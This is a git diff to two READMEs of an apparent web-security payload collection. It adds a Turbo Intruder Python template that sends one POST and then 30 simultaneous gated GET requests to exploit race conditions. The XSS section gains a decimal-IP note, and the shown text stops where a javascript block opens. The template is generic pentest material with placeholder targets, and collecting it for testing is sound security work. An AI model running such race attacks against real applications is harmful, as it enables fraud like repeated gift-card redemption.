diff --git a/Race Condition/README.md b/Race Condition/README.md index 2e70df8..1986c47 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md @@ -41,9 +41,40 @@ 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 4. Click "Attack" +## Turbo Intruder 2 Requests Examples +This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=100, + pipeline=False + ) + request1 = ''' +POST /target-URI-1 HTTP/1.1 +Host: +Cookie: session= + +parameterName=parameterValue + ''' + + request2 = ''' +GET /target-URI-2 HTTP/1.1 +Host: +Cookie: session= + ''' + + engine.queue(request1, gate='race1') + for i in range(30): + engine.queue(request2, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) +def handleResponse(req, interesting): + table.add(req) +``` ## References * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) -* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) \ No newline at end of file +* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 5dee5d6..8309a2d 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` http://www.geektools.com/cgi-bin/ipconv.cgi +```javascript +